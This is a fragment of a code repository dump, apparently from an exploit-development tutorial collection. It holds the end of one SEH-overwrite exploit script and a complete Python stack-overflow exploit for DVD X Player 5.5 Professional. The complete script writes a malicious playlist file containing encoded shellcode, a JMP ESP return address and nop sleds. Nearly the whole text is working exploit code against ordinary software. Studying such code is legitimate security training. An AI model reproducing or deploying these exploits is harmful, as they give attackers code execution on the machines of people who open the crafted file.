22 | poppopret = "\xdb\x2a\x60\x61"
23 | 
24 | buffer = "A" * 608 + "\x90\x90\xeb\x06" + poppopret + "\x90"*16 + sc + "\x90"*(2000-608-4-4-16-144)
25 |   
26 | textfile = open(filename , 'w')
27 | textfile.write(buffer)
28 | textfile.close()
29 | 


--------------------------------------------------------------------------------
/FuzzySecurity/dvdxplayer_stackbasedexploit.py:
--------------------------------------------------------------------------------
 1 | # Product name: DVD X Player 5.5 Professional
 2 | # Exploit type: Stack based overflow exploit
 3 | # Author: Abatchy
 4 | 
 5 | #!/usr/bin/python -w
 6 |   
 7 | filename="evil.plf"
 8 | 
 9 | sc = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
10 | "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
11 | "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
12 | "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
13 | "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
14 | "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
15 | "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
16 | "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
17 | "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
18 | "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
19 | "\x7f\xe8\x7b\xca")
20 | 
21 | # JMP ESP found in EPG.dll
22 | ret = "\xcb\x25\x65\x61"
23 | 
24 | buffer = "A" * 260 + ret + "C" * 16 + "\xcc\xcc\xcc\xcc" + "\x90"*16 + sc + "\x90" * (2000-260-4-16-4-144)
25 |   
26 | textfile = open(filename , 'w')
27 | textfile.write(buffer)
28 | textfile.close()
29 | 


--------------------------------------------------------------------------------